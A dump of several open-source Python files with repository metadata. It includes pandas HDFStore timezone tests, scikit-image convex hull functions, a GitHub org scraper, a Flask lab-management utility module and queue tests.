| true
| false
| false
|
datapythonista/pandas
|
pandas/tests/io/pytables/test_timezones.py
|
2
|
11495
|
from datetime import (
date,
timedelta,
)
import numpy as np
import pytest
from pandas._libs.tslibs.timezones import maybe_get_tz
import pandas.util._test_decorators as td
import pandas as pd
from pandas import (
DataFrame,
DatetimeIndex,
Series,
Timestamp,
date_range,
)
import pandas._testing as tm
from pandas.tests.io.pytables.common import (
_maybe_remove,
ensure_clean_path,
ensure_clean_store,
)
# TODO(ArrayManager) HDFStore relies on accessing the blocks
pytestmark = td.skip_array_manager_not_yet_implemented
def _compare_with_tz(a, b):
tm.assert_frame_equal(a, b)
# compare the zones on each element
for c in a.columns:
for i in a.index:
a_e = a.loc[i, c]
b_e = b.loc[i, c]
if not (a_e == b_e and a_e.tz == b_e.tz):
raise AssertionError(f"invalid tz comparison [{a_e}] [{b_e}]")
# use maybe_get_tz instead of dateutil.tz.gettz to handle the windows
# filename issues.
gettz_dateutil = lambda x: maybe_get_tz("dateutil/" + x)
gettz_pytz = lambda x: x
@pytest.mark.parametrize("gettz", [gettz_dateutil, gettz_pytz])
def test_append_with_timezones(setup_path, gettz):
# as columns
# Single-tzinfo, no DST transition
df_est = DataFrame(
{
"A": [
Timestamp("20130102 2:00:00", tz=gettz("US/Eastern"))
+ timedelta(hours=1) * i
for i in range(5)
]
}
)
# frame with all columns having same tzinfo, but different sides
# of DST transition
df_crosses_dst = DataFrame(
{
"A": Timestamp("20130102", tz=gettz("US/Eastern")),
"B": Timestamp("20130603", tz=gettz("US/Eastern")),
},
index=range(5),
)
df_mixed_tz = DataFrame(
{
"A": Timestamp("20130102", tz=gettz("US/Eastern")),
"B": Timestamp("20130102", tz=gettz("EET")),
},
index=range(5),
)
df_different_tz = DataFrame(
{
"A": Timestamp("20130102", tz=gettz("US/Eastern")),
"B": Timestamp("20130102", tz=gettz("CET")),
},
index=range(5),
)
with ensure_clean_store(setup_path) as store:
_maybe_remove(store, "df_tz")
store.append("df_tz", df_est, data_columns=["A"])
result = store["df_tz"]
_compare_with_tz(result, df_est)
tm.assert_frame_equal(result, df_est)
# select with tz aware
expected = df_est[df_est.A >= df_est.A[3]]
result = store.select("df_tz", where="A>=df_est.A[3]")
_compare_with_tz(result, expected)
# ensure we include dates in DST and STD time here.
_maybe_remove(store, "df_tz")
store.append("df_tz", df_crosses_dst)
result = store["df_tz"]
_compare_with_tz(result, df_crosses_dst)
tm.assert_frame_equal(result, df_crosses_dst)
msg = (
r"invalid info for \[values_block_1\] for \[tz\], "
r"existing_value \[(dateutil/.*)?US/Eastern\] "
r"conflicts with new value \[(dateutil/.*)?EET\]"
)
with pytest.raises(ValueError, match=msg):
store.append("df_tz", df_mixed_tz)
# this is ok
_maybe_remove(store, "df_tz")
store.append("df_tz", df_mixed_tz, data_columns=["A", "B"])
result = store["df_tz"]
_compare_with_tz(result, df_mixed_tz)
tm.assert_frame_equal(result, df_mixed_tz)
# can't append with diff timezone
msg = (
r"invalid info for \[B\] for \[tz\], "
r"existing_value \[(dateutil/.*)?EET\] "
r"conflicts with new value \[(dateutil/.*)?CET\]"
)
with pytest.raises(ValueError, match=msg):
store.append("df_tz", df_different_tz)
@pytest.mark.parametrize("gettz", [gettz_dateutil, gettz_pytz])
def test_append_with_timezones_as_index(setup_path, gettz):
# GH#4098 example
dti = date_range("2000-1-1", periods=3, freq="H", tz=gettz("US/Eastern"))
dti = dti._with_freq(None) # freq doesn't round-trip
df = DataFrame({"A": Series(range(3), index=dti)})
with ensure_clean_store(setup_path) as store:
_maybe_remove(store, "df")
store.put("df", df)
result = store.select("df")
tm.assert_frame_equal(result, df)
_maybe_remove(store, "df")
store.append("df", df)
result = store.select("df")
tm.assert_frame_equal(result, df)
def test_roundtrip_tz_aware_index(setup_path):
# GH 17618
time = Timestamp("2000-01-01 01:00:00", tz="US/Eastern")
df = DataFrame(data=[0], index=[time])
with ensure_clean_store(setup_path) as store:
store.put("frame", df, format="fixed")
recons = store["frame"]
tm.assert_frame_equal(recons, df)
assert recons.index[0].value == 946706400000000000
def test_store_index_name_with_tz(setup_path):
# GH 13884
df = DataFrame({"A": [1, 2]})
df.index = DatetimeIndex([1234567890123456787, 1234567890123456788])
df.index = df.index.tz_localize("UTC")
df.index.name = "foo"
with ensure_clean_store(setup_path) as store:
store.put("frame", df, format="table")
recons = store["frame"]
tm.assert_frame_equal(recons, df)
def test_tseries_select_index_column(setup_path):
# GH7777
# selecting a UTC datetimeindex column did
# not preserve UTC tzinfo set before storing
# check that no tz still works
rng = date_range("1/1/2000", "1/30/2000")
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
with ensure_clean_store(setup_path) as store:
store.append("frame", frame)
result = store.select_column("frame", "index")
assert rng.tz == DatetimeIndex(result.values).tz
# check utc
rng = date_range("1/1/2000", "1/30/2000", tz="UTC")
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
with ensure_clean_store(setup_path) as store:
store.append("frame", frame)
result = store.select_column("frame", "index")
assert rng.tz == result.dt.tz
# double check non-utc
rng = date_range("1/1/2000", "1/30/2000", tz="US/Eastern")
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
with ensure_clean_store(setup_path) as store:
store.append("frame", frame)
result = store.select_column("frame", "index")
assert rng.tz == result.dt.tz
def test_timezones_fixed_format_frame_non_empty(setup_path):
with ensure_clean_store(setup_path) as store:
# index
rng = date_range("1/1/2000", "1/30/2000", tz="US/Eastern")
rng = rng._with_freq(None) # freq doesn't round-trip
df = DataFrame(np.random.randn(len(rng), 4), index=rng)
store["df"] = df
result = store["df"]
tm.assert_frame_equal(result, df)
# as data
# GH11411
_maybe_remove(store, "df")
df = DataFrame(
{
"A": rng,
"B": rng.tz_convert("UTC").tz_localize(None),
"C": rng.tz_convert("CET"),
"D": range(len(rng)),
},
index=rng,
)
store["df"] = df
result = store["df"]
tm.assert_frame_equal(result, df)
def test_timezones_fixed_format_empty(setup_path, tz_aware_fixture, frame_or_series):
# GH 20594
dtype = pd.DatetimeTZDtype(tz=tz_aware_fixture)
obj = Series(dtype=dtype, name="A")
if frame_or_series is DataFrame:
obj = obj.to_frame()
with ensure_clean_store(setup_path) as store:
store["obj"] = obj
result = store["obj"]
tm.assert_equal(result, obj)
def test_timezones_fixed_format_series_nonempty(setup_path, tz_aware_fixture):
# GH 20594
dtype = pd.DatetimeTZDtype(tz=tz_aware_fixture)
with ensure_clean_store(setup_path) as store:
s = Series([0], dtype=dtype)
store["s"] = s
result = store["s"]
tm.assert_series_equal(result, s)
def test_fixed_offset_tz(setup_path):
rng = date_range("1/1/2000 00:00:00-07:00", "1/30/2000 00:00:00-07:00")
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
with ensure_clean_store(setup_path) as store:
store["frame"] = frame
recons = store["frame"]
tm.assert_index_equal(recons.index, rng)
assert rng.tz == recons.index.tz
@td.skip_if_windows
def test_store_timezone(setup_path):
# GH2852
# issue storing datetime.date with a timezone as it resets when read
# back in a new timezone
# original method
with ensure_clean_store(setup_path) as store:
today = date(2013, 9, 10)
df = DataFrame([1, 2, 3], index=[today, today, today])
store["obj1"] = df
result = store["obj1"]
tm.assert_frame_equal(result, df)
# with tz setting
with ensure_clean_store(setup_path) as store:
with tm.set_timezone("EST5EDT"):
today = date(2013, 9, 10)
df = DataFrame([1, 2, 3], index=[today, today, today])
store["obj1"] = df
with tm.set_timezone("CST6CDT"):
result = store["obj1"]
tm.assert_frame_equal(result, df)
def test_legacy_datetimetz_object(datapath, setup_path):
# legacy from < 0.17.0
# 8260
expected = DataFrame(
{
"A": Timestamp("20130102", tz="US/Eastern"),
"B": Timestamp("20130603", tz="CET"),
},
index=range(5),
)
with ensure_clean_store(
datapath("io", "data", "legacy_hdf", "datetimetz_object.h5"), mode="r"
) as store:
result = store["df"]
tm.assert_frame_equal(result, expected)
def test_dst_transitions(setup_path):
# make sure we are not failing on transitions
with ensure_clean_store(setup_path) as store:
times = date_range(
"2013-10-26 23:00",
"2013-10-27 01:00",
tz="Europe/London",
freq="H",
ambiguous="infer",
)
times = times._with_freq(None) # freq doesn't round-trip
for i in [times, times + pd.Timedelta("10min")]:
_maybe_remove(store, "df")
df = DataFrame({"A": range(len(i)), "B": i}, index=i)
store.append("df", df)
result = store.select("df")
tm.assert_frame_equal(result, df)
def test_read_with_where_tz_aware_index(setup_path):
# GH 11926
periods = 10
dts = date_range("20151201", periods=periods, freq="D", tz="UTC")
mi = pd.MultiIndex.from_arrays([dts, range(periods)], names=["DATE", "NO"])
expected = DataFrame({"MYCOL": 0}, index=mi)
key = "mykey"
with ensure_clean_path(setup_path) as path:
with pd.HDFStore(path) as store:
store.append(key, expected, format="table", append=True)
result = pd.read_hdf(path, key, where="DATE > 20151130")
tm.assert_frame_equal(result, expected)
def test_py2_created_with_datetimez(datapath, setup_path):
# The test HDF5 file was created in Python 2, but could not be read in
# Python 3.
#
# GH26443
index = [Timestamp("2019-01-01T18:00").tz_localize("America/New_York")]
expected = DataFrame({"data": 123}, index=index)
with ensure_clean_store(
datapath("io", "data", "legacy_hdf", "gh26443.h5"), mode="r"
) as store:
result = store["key"]
tm.assert_frame_equal(result, expected)
|
bsd-3-clause
| -4,588,879,910,586,167,000
| 29.817694
| 85
| 0.582427
| false
| 3.333817
| true
| false
| false
|
WarrenWeckesser/scikits-image
|
skimage/morphology/convex_hull.py
|
2
|
3703
|
__all__ = ['convex_hull_image', 'convex_hull_object']
import numpy as np
from ..measure._pnpoly import grid_points_in_poly
from ._convex_hull import possible_hull
from ..measure._label import label
from ..util import unique_rows
try:
from scipy.spatial import Delaunay
except ImportError:
Delaunay = None
def convex_hull_image(image):
"""Compute the convex hull image of a binary image.
The convex hull is the set of pixels included in the smallest convex
polygon that surround all white pixels in the input image.
Parameters
----------
image : (M, N) array
Binary input image. This array is cast to bool before processing.
Returns
-------
hull : (M, N) array of bool
Binary image with pixels in convex hull set to True.
References
----------
.. [1] http://blogs.mathworks.com/steve/2011/10/04/binary-image-convex-hull-algorithm-notes/
"""
if Delaunay is None:
raise ImportError("Could not import scipy.spatial.Delaunay, "
"only available in scipy >= 0.9.")
# Here we do an optimisation by choosing only pixels that are
# the starting or ending pixel of a row or column. This vastly
# limits the number of coordinates to examine for the virtual hull.
coords = possible_hull(image.astype(np.uint8))
N = len(coords)
# Add a vertex for the middle of each pixel edge
coords_corners = np.empty((N * 4, 2))
for i, (x_offset, y_offset) in enumerate(zip((0, 0, -0.5, 0.5),
(-0.5, 0.5, 0, 0))):
coords_corners[i * N:(i + 1) * N] = coords + [x_offset, y_offset]
# repeated coordinates can *sometimes* cause problems in
# scipy.spatial.Delaunay, so we remove them.
coords = unique_rows(coords_corners)
# Subtract offset
offset = coords.mean(axis=0)
coords -= offset
# Find the convex hull
chull = Delaunay(coords).convex_hull
v = coords[np.unique(chull)]
# Sort vertices clock-wise
v_centred = v - v.mean(axis=0)
angles = np.arctan2(v_centred[:, 0], v_centred[:, 1])
v = v[np.argsort(angles)]
# Add back offset
v += offset
# For each pixel coordinate, check whether that pixel
# lies inside the convex hull
mask = grid_points_in_poly(image.shape[:2], v)
return mask
def convex_hull_object(image, neighbors=8):
"""Compute the convex hull image of individual objects in a binary image.
The convex hull is the set of pixels included in the smallest convex
polygon that surround all white pixels in the input image.
Parameters
----------
image : ndarray
Binary input image.
neighbors : {4, 8}, int
Whether to use 4- or 8-connectivity.
Returns
-------
hull : ndarray of bool
Binary image with pixels in convex hull set to True.
Notes
-----
This function uses skimage.morphology.label to define unique objects,
finds the convex hull of each using convex_hull_image, and combines
these regions with logical OR. Be aware the convex hulls of unconnected
objects may overlap in the result. If this is suspected, consider using
convex_hull_image separately on each object.
"""
if neighbors != 4 and neighbors != 8:
raise ValueError('Neighbors must be either 4 or 8.')
labeled_im = label(image, neighbors, background=0)
convex_obj = np.zeros(image.shape, dtype=bool)
convex_img = np.zeros(image.shape, dtype=bool)
for i in range(0, labeled_im.max() + 1):
convex_obj = convex_hull_image(labeled_im == i)
convex_img = np.logical_or(convex_img, convex_obj)
return convex_img
|
bsd-3-clause
| 7,252,472,451,150,757,000
| 30.117647
| 96
| 0.644883
| false
| 3.623288
| false
| false
| false
|
evancasey/startup-finder
|
lib/github_dump.py
|
1
|
1658
|
import urllib
import urllib2
import json
import pdb
import sys
import time
import csv
import tokens
from models import *
class GithubListener:
def get_all_repos(self,org):
url = "https://api.github.com/orgs/" + org + "/repos?client_id=" + tokens.GITHUB_ID + "&client_secret=" + tokens.GITHUB_SECRET
try:
resource = urllib2.urlopen(url)
pages = json.loads(resource.read())
return pages
except:
print("path not found")
pass
def get_all_orgs_csv(self):
orgs = []
f = open('all_orgs.txt', 'rt')
reader = csv.reader(f)
for row in reader:
orgs += row
return orgs
if __name__ == "__main__":
gl = GithubListener()
orgs = gl.get_all_orgs_csv()
counter = 0
for org in orgs[100:]:
repos = gl.get_all_repos(org)
if repos:
for repo in repos:
print(json.dumps(repo,indent=2))
counter +=1
try:
github_data = Github(id = str(counter),
organization = org,
repos = json.dumps(repos))
Session.add(github_data)
print "Committing.."
Session.commit()
except Exception, e:
print >> sys.stderr, 'Encountered Exception: ', e
pass
|
mit
| -1,315,194,730,258,532,000
| 20.269231
| 142
| 0.431242
| false
| 4.657303
| false
| false
| false
|
reed-college/lemur
|
lemur/utility_modify.py
|
1
|
23527
|
# Libraries
# Local
from lemur import models as m
from lemur import (app, db)
from lemur.utility_generate_and_convert import (check_existence,
generate_lab_id,
generate_experiment_id,
generate_observation_id,
generate_class_id,
generate_user_name,
decompose_lab_id,
tranlate_term_code_to_semester,
cleanup_class_data)
from lemur.utility_find_and_get import (lab_exists,
experiment_exists,
class_exists,
observation_exists,
user_exists,
get_lab,
get_observation,
get_user,
get_class,
get_role,
get_all_class,
get_all_user,
get_experiments_for_lab,
get_observations_for_experiment,
find_lab_copy_id)
ds = db.session
# --- Manage labs ---
# Delete a lab's basic info, experiments info and observations info
def delete_lab(lab_id):
ds.delete(get_lab(lab_id))
experiments_query = get_experiments_for_lab(lab_id)
for e in experiments_query:
ds.delete(e)
ds.commit()
# Modify a lab
def modify_lab(lab_json):
the_class = None
class_users = []
experiments_for_lab = []
lab_status = 'Unactivated'
lab_id = None
err_msg = check_existence(lab_json, 'labName', 'classId', 'labDescription',
'experiments', 'oldLabId')
if lab_exists(lab_json['oldLabId']):
lab_status = get_lab(lab_json['oldLabId']).status
delete_lab(lab_json['oldLabId'])
if not class_exists(lab_json['classId']):
err_msg += 'class id: {0} doesn\' exist in the database'.format(lab_json['classId'])
if err_msg != '':
return err_msg
the_class = get_class(lab_json['classId'])
# Build connection between the current lab and the existing users/class
if the_class is not None:
class_users = the_class.users
lab_id = generate_lab_id(lab_json['labName'], lab_json['classId'])
if lab_exists(lab_id):
return 'lab id:{0} already exists'.format(lab_id)
for e in lab_json['experiments']:
err_msg = check_existence(e, 'name', 'description', 'order',
'valueType', 'valueRange',
'valueCandidates')
if err_msg != '':
return err_msg
for e in lab_json['experiments']:
experiment_name = e['name']
# Check if the experiment name already repetes among all the
# experiments to be added into the current lab
for i in range(len(lab_json['experiments'])):
if [exp['name'] for exp in lab_json['experiments']].count(experiment_name) > 1:
lab_json['experiments'] = (lab_json['experiments'][0:i] +
lab_json['experiments'][i+1:len(lab_json['experiments'])])
warning_msg = 'repeted experiment name:{} in this lab'.format(experiment_name)
app.logger.warning(warning_msg)
continue
experiment_id = generate_experiment_id(lab_id, experiment_name)
if experiment_exists(experiment_id):
warning_msg = 'The same experiment name has already exist in the same lab'
app.logger.warning(warning_msg)
continue
else:
experiments_for_lab.append(m.Experiment(lab_id=lab_id,
id=experiment_id,
name=experiment_name,
description=e['description'],
order=e['order'],
value_type=e['valueType'],
value_range=e['valueRange'],
value_candidates=e['valueCandidates']))
the_lab = m.Lab(id=lab_id, name=lab_json['labName'],
description=lab_json['labDescription'],
status=lab_status,
the_class=the_class,
experiments=experiments_for_lab,
users=class_users)
ds.add(the_lab)
ds.commit()
return ''
# copy a old lab and rename the new lab with 'copy'+index+'-'+old_lab_name
def duplicate_lab(old_lab_id):
# Find a new lab id according to the old lab id
new_lab_id = find_lab_copy_id(old_lab_id)
# Copy info from old lab and add to new lab
old_lab = get_lab(old_lab_id)
# A lab can only belong to one class at this point
old_class = get_class(old_lab.the_class.id)
new_lab = m.Lab(id=new_lab_id,
name=decompose_lab_id(new_lab_id)['lab_name'],
description=old_lab.description, status=old_lab.status,
the_class=old_class, users=old_class.users)
new_experiments = []
for e in old_lab.experiments:
experiment_name = e.name
new_experiment_id = generate_experiment_id(new_lab_id,
experiment_name)
new_experiment = m.Experiment(lab_id=new_lab_id,
id=new_experiment_id,
name=experiment_name,
description=e.description,
order=e.order,
value_type=e.value_type,
value_range=e.value_range,
value_candidates=e.value_candidates)
new_experiments.append(new_experiment)
new_lab.experiments = new_experiments
ds.add(new_lab)
ds.commit()
# Change a lab's status
def change_lab_status(lab_id, new_status):
lab_query = get_lab(lab_id)
lab_query.status = new_status
# Automatically delete all the data in the lab if it's made unavailable
if new_status == "Unactivated":
experiments_query = get_experiments_for_lab(lab_query.id)
for e in experiments_query:
for d in get_observations_for_experiment(e.id):
ds.delete(d)
ds.commit()
# --- Manage observations ---
# delete observation from a list of observation ids sent from client
def delete_observation(old_observation_ids_list):
err_msg = ''
# delete all the old data by old observation_id
for observation_id in old_observation_ids_list:
observations_query = get_observation(observation_id)
# Check the existence of the observation to be deleted
if observation_exists(observation_id):
ds.delete(observations_query)
# err_msg += ('To be deleted observation:' +
# '{} doesn\'t exits in db\n'.format(observations_query))
ds.commit()
return err_msg
# add observation from a list JSON format observations sent from client
# This function is invoked when admin edits data of a lab
def add_observation(new_observations_list):
warning_msg = ''
for d in new_observations_list:
err_msg = check_existence(d, 'studentName', 'observationData',
'experimentId', 'observationId')
if err_msg != '':
return err_msg
for d in new_observations_list:
# Check if the observation name already repetes among all the
# observations to be added into the database and rename it if necessary
index = 1
tmp_student_name = d['studentName']
tmp_observation_id = d['observationId']
while observation_exists(tmp_observation_id):
tmp_student_name = d['studentName'] + '('+str(index)+')'
tmp_observation_id = generate_observation_id(d['experimentId'], tmp_student_name)
index += 1
# warning_msg = ('repeated observation id:{} in this lab so the ' +
# 'current, modified entry will be renamed to ' +
# '{}'.format(d['observationId'], tmp_observation_id))
# Capitalize every input
ds.add(m.Observation(experiment_id=d['experimentId'],
id=tmp_observation_id,
student_name=tmp_student_name,
datum=d['observationData'].upper()))
ds.commit()
return warning_msg
# add observations sent by students into the database
# This function is invoked when a student send a group of data
def add_observations_sent_by_students(observations_group_by_student):
# the data type of observations should be a list
if not(isinstance(observations_group_by_student, list)):
err_msg = 'The value of the key observations should be a list'
return err_msg
# check that all list elements have the right format
for student in observations_group_by_student:
err_msg = check_existence(student, 'studentName',
'observationsForOneExperiment')
if err_msg != '':
return err_msg
for ob in student['observationsForOneExperiment']:
err_msg = check_existence(ob, 'labId', 'experimentName',
'observation')
if err_msg != '':
return err_msg
# If everything is correct add the data to the database
experiment_id = generate_experiment_id(ob['labId'], ob['experimentName'])
# To avoid repetition in student name field since it's used as part
# of key for an input we add an unique index at the end of
# each student name
tmp_student_name = student['studentName']+'(1)'
observation_id = generate_observation_id(experiment_id,
tmp_student_name)
index = 2
while observation_exists(observation_id):
tmp_student_name = student['studentName'] + '('+str(index)+')'
observation_id = generate_observation_id(experiment_id,
tmp_student_name)
index += 1
# Capitalize every input
if not observation_exists(observation_id):
ds.add(m.Observation(experiment_id=experiment_id,
id=observation_id,
student_name=tmp_student_name,
datum=ob['observation'].upper()))
ds.commit()
return ''
# --- Manage admins ---
# add an admin into the database according to admin_info
def add_user(user_info):
# Get role object from table
user_role = get_role(user_info['role'])
# id of the Admin must be unique before user can be created
err_msg = check_existence(user_info, 'username', 'role')
if err_msg != '':
return err_msg
classes = []
labs = []
if user_info['role'] == 'Student':
for class_id in user_info.getlist('classIds'):
if class_exists(class_id):
the_class = get_class(class_id)
classes.append(the_class)
for lab in the_class.labs:
labs.append(lab)
else:
return 'the class with id:{} doesn\'t exist.'.format(class_id)
if not user_exists(user_info['username']):
name = None
if 'name' in user_info:
name = user_info['name']
new_user = m.User(id=user_info['username'],
name=name,
role=user_role,
classes=classes,
labs=labs)
ds.add(new_user)
ds.commit()
else:
err_msg = 'The username:{} already exists'.format(user_info['username'])
return err_msg
# change the user's info(including role and classes)
def change_user_info(username, role, class_ids):
user = get_user(username)
classes = []
labs = []
if class_ids:
for c in class_ids:
the_class = get_class(c)
classes.append(the_class)
for lab in the_class.labs:
labs.append(lab)
user.role = get_role(role)
user.classes = classes
user.labs = labs
ds.commit()
# delete an admin from the database
def delete_user(username):
user_to_be_removed = get_user(username)
ds.delete(user_to_be_removed)
ds.commit()
# add a class into the database according to class_info
def add_class(class_info):
# Check the correctness of data format
# Note: students is optional i.e. it can be undefined
err_msg = check_existence(class_info, 'className', 'classTime')
if err_msg != '':
return err_msg
users = []
usernames = []
# create new class with data sent by client to be added to database
new_class_id = generate_class_id(
class_info['className'], class_info['classTime'])
if not class_exists(new_class_id):
if 'professors' in class_info:
for p in class_info.getlist('professors'):
if not user_exists(p):
err_msg = 'The professor with id:{} doesn\'t exist.'.format(p)
return err_msg
else:
usernames.append(p)
if 'students' in class_info:
for s in class_info.getlist('students'):
if not user_exists(s):
err_msg = 'The student with id:{} doesn\'t exist.'.format(p)
return err_msg
elif get_user(s).role_name != 'Student':
err_msg = s+(' already exists and is not a student.'
'You should not put their name into student name')
return err_msg
else:
usernames.append(s)
for username in usernames:
users.append(get_user(username))
new_class = m.Class(id=new_class_id,
name=class_info['className'],
time=class_info['classTime'],
users=users)
ds.add(new_class)
ds.commit()
else:
err_msg = "The class id already exists: {}".format(get_class(new_class_id))
return err_msg
# ---Manage classes---
# remove a class from the database according to class_id
def delete_class(class_id):
class_to_be_removed = get_class(class_id)
# discard users not enrolled in any other class with labs
# discard labs associated with the class to be deleted
for s in class_to_be_removed.users:
if s.role_name == 'Student' and len(s.classes) == 1:
ds.delete(s)
for l in class_to_be_removed.labs:
if lab_exists(l.id):
ds.delete(get_lab(l.id))
ds.delete(class_to_be_removed)
ds.commit()
# Change the users(both professors and students) in a class
def change_class_users(class_id, new_users):
if not class_exists(class_id):
return 'Class with id: {} doesn\'t exist'.format(class_id)
the_class = get_class(class_id)
old_users = the_class.users
# Add new users to the class;
# add the associated labs to these users lab list
for u in new_users:
if not user_exists(str(u)):
ds.rollback()
return 'User with username: {} doesn\'t exist'.format(u)
else:
user = get_user(u)
if not (u in the_class.users):
the_class.users.append(user)
user.labs = the_class.labs
# Delete the class and the associated labs from old users who
# are not in the class anymore
for u in old_users:
if not(u.id in str(new_users)):
u.classes = [c for c in u.classes if c.id != class_id]
new_lab_list = []
for lab in u.labs:
if lab.the_class.id != class_id:
new_lab_list.append(lab)
u.labs = new_lab_list
ds.commit()
return ''
# --- Initialize Classes and Users by getting data from Iris ---
# Populate the database with classes and their corresponding professors
# Note: This needs to be invoked before update_users_by_data_from_iris
# The existing professors will not be deleted even if they don't teach
# any class
def populate_db_with_classes_and_professors(class_data):
class_data = cleanup_class_data(class_data)
for c in class_data:
class_name = c['subject'] + c['course_number']
class_time = tranlate_term_code_to_semester(c['term_code'])
class_professor_info_list = c['instructors']
class_professor_ids = [p['username'] for p in class_professor_info_list]
class_professors = []
for p in class_professor_info_list:
if not user_exists(p['username']):
name = generate_user_name(p['first_name'], p['last_name'])
ds.add(m.User(id=p['username'], name=name, role=get_role('Admin')))
ds.commit()
the_user = get_user(p['username'])
class_professors.append(the_user)
if class_name and class_time:
class_id = generate_class_id(class_name, class_time)
# If the class already exists, update the professors and keep
# the students
if class_exists(class_id):
the_class = get_class(class_id)
# handle the change of class and the labs associated with it
old_class_professors = [u for u in the_class.users if ((u.role_name == 'Admin') or (u.role_name == 'SuperAdmin'))]
for p in class_professors:
# Add the class to the professor's class list if it is not
# the list now.
if not (class_id in [c.id for c in p.classes]):
p.classes.append(the_class)
for lab in the_class.labs:
if not (lab in p.labs):
p.labs.append(lab)
ds.commit()
# Remove the class from the old professor's class list
# if the professor is no longer in the class's user list.
for p in old_class_professors:
if not (p.id in class_professor_ids):
p.classes = [c for c in p.classes if c.id != class_id]
p.labs = [lab for lab in p.labs if lab.class_id != class_id]
# otherwise create a class with the professors
else:
ds.add(m.Class(id=class_id, name=class_name, time=class_time,
users=class_professors))
else:
return 'class_time is not valid:{}'.format(class_time)
ds.commit()
return ''
# Update the users in the classes according to registration info
def update_students_by_data_from_iris(class_id_list, registration_data):
all_classes = get_all_class()
selected_classes = [c for c in all_classes if c.id in class_id_list]
registration_by_class = {}
warning_msg = ''
# A registration_object looks like
# {"user_name":"fake1","course_id":"10256","term_code":"201501",
# "subject":"BIOL","course_number":"101","section":"FTN",
# "first_name":"Fake", "last_name":"One"}
# Add the students in the received data into the database
for registration_object in registration_data:
username = registration_object['user_name']
invalid_list = [None, 'undefined', 'null', '']
# Since username is our key for User object, it cannot be empty
# If that happens, we skip the current user
if username in invalid_list:
continue
name = generate_user_name(registration_object['first_name'],
registration_object['last_name'])
class_id = generate_class_id((registration_object['subject'] +
registration_object['course_number']),
tranlate_term_code_to_semester(registration_object['term_code']))
# only students who registered courses in the list will be updated
if class_id not in class_id_list:
continue
# If the class exists in the database, update
if class_exists(class_id):
the_class = get_class(class_id)
# If user already exists, add the class into the class list of the
# user;
# otherwise, create a user with the class
if user_exists(username):
the_user = get_user(username)
if not (class_id in [c.id for c in the_user.classes]):
the_user.classes.append(the_class)
for lab in the_class.labs:
if not (lab in the_user.labs):
the_user.labs.append(lab)
else:
the_user = m.User(id=username, name=name, classes=[the_class],
role=get_role('Student'), labs=the_class.labs)
ds.add(the_user)
# else return a warning message to notify the user
else:
warning_msg += ('class_id: ' + class_id +
' doesn\'t exist in database\n')
# for efficiency: otherwise we have to loop through
# registration_data many times
if class_id in registration_by_class:
registration_by_class[class_id].append(username)
else:
registration_by_class[class_id] = []
# Check the students of the classes in the database and update them
# according to the received data
for c in selected_classes:
# If the class exists in the received data, compare
# the users of the class in database and data
if c.id in registration_by_class:
# Keep the admins/superadmins of the class
class_new_users = [u for u in c.users if ((u.role_name == 'Admin') or (u.role_name == 'SuperAdmin'))]
# Replace the students of the class with the students in the
# received data
for student_id in registration_by_class[c.id]:
class_new_users.append(get_user(student_id))
c.users = class_new_users
else:
warning_msg += ('class_id: ' + class_id +
' doesn\'t exist in received data\n')
ds.commit()
return warning_msg
# Delete all students in the database
# The current function will not report any warning messages
def delete_all_students():
for u in get_all_user():
if u.role_name == "Student":
ds.delete(u)
ds.commit()
return ''
|
mit
| -2,824,706,532,023,522,000
| 42.649351
| 130
| 0.538403
| false
| 4.196753
| false
| false
| false
|
Egor-Krivov/pdp
|
tests/test_base.py
|
1
|
3421
|
import unittest
import time
from contextlib import suppress
from queue import Queue as ThreadQueue
from threading import Thread
from threading import Event as ThreadEvent
import numpy as np
from pdp.base import InterruptableQueue, StopEvent, start_one2one_transformer
DEFAULT_LOOP_TIMEOUT = 0.02
def set_event_after_timeout(event, timeout):
def target():
time.sleep(timeout)
event.set()
Thread(target=target).start()
class TestInterruptableQueue(unittest.TestCase):
def setUp(self):
self.maxsize = 10
self.loop_timeout = DEFAULT_LOOP_TIMEOUT
self.wait_timeout = 7.5 * self.loop_timeout
self.receive_timeout = 0.5 * self.loop_timeout
self.stop_event = ThreadEvent()
self.q = InterruptableQueue(ThreadQueue(self.maxsize), self.loop_timeout, self.stop_event)
def test_get(self):
def target():
with suppress(StopEvent):
self.q.get()
thread = Thread(target=target)
thread.start()
self.assertTrue(thread.is_alive())
set_event_after_timeout(event=self.stop_event, timeout=self.wait_timeout + self.receive_timeout)
self.assertTrue(thread.is_alive())
time.sleep(self.wait_timeout)
self.assertTrue(thread.is_alive())
time.sleep(self.receive_timeout * 2)
self.assertFalse(thread.is_alive())
def test_put(self):
for i in range(self.maxsize):
self.q.put(i)
def target():
with suppress(StopEvent):
self.q.put(-1)
thread = Thread(target=target)
thread.start()
self.assertTrue(thread.is_alive())
set_event_after_timeout(event=self.stop_event, timeout=self.wait_timeout + self.receive_timeout)
self.assertTrue(thread.is_alive())
time.sleep(self.wait_timeout)
self.assertTrue(thread.is_alive())
time.sleep(self.receive_timeout * 2)
self.assertFalse(thread.is_alive())
class testOne2One(unittest.TestCase):
def setUp(self):
self.buffer_size = 20
self.loop_timeout = DEFAULT_LOOP_TIMEOUT
self.stop_event = ThreadEvent()
self.q_in = InterruptableQueue(ThreadQueue(self.buffer_size), self.loop_timeout, self.stop_event)
self.q_out = InterruptableQueue(ThreadQueue(self.buffer_size), self.loop_timeout, self.stop_event)
def tearDown(self):
self.q_in.join()
self.q_out.join()
def data_pass(self, n_workers):
data_in = np.random.randn(self.buffer_size * 10)
def f(x):
return x ** 2
data_out_true = f(data_in)
start_one2one_transformer(f, q_in=self.q_in, q_out=self.q_out, stop_event=self.stop_event, n_workers=n_workers)
i = 0
data_out = []
for d in data_in:
self.q_in.put(d)
i += 1
if i == self.buffer_size:
for j in range(self.buffer_size):
data_out.append(self.q_out.get())
self.q_out.task_done()
i = 0
if n_workers > 1:
data_out_true = sorted(data_out_true)
data_out = sorted(data_out)
np.testing.assert_equal(data_out, data_out_true)
def test_data_pass(self):
for n_workers in (1, 4, 10):
with self.subTest(f'n_workers={n_workers}'):
self.data_pass(n_workers=n_workers)
|
mit
| -184,339,067,233,399,360
| 29.81982
| 119
| 0.609763
| false
| 3.582199
| true
| false
| false
|
modoboa/modoboa-stats
|
modoboa_stats/forms.py
|
1
|
1691
|
"""Modoboa stats forms."""
import rrdtool
from pkg_resources import parse_version
from django.conf import settings
from django.utils.translation import ugettext_lazy
from django import forms
from modoboa.lib import form_utils
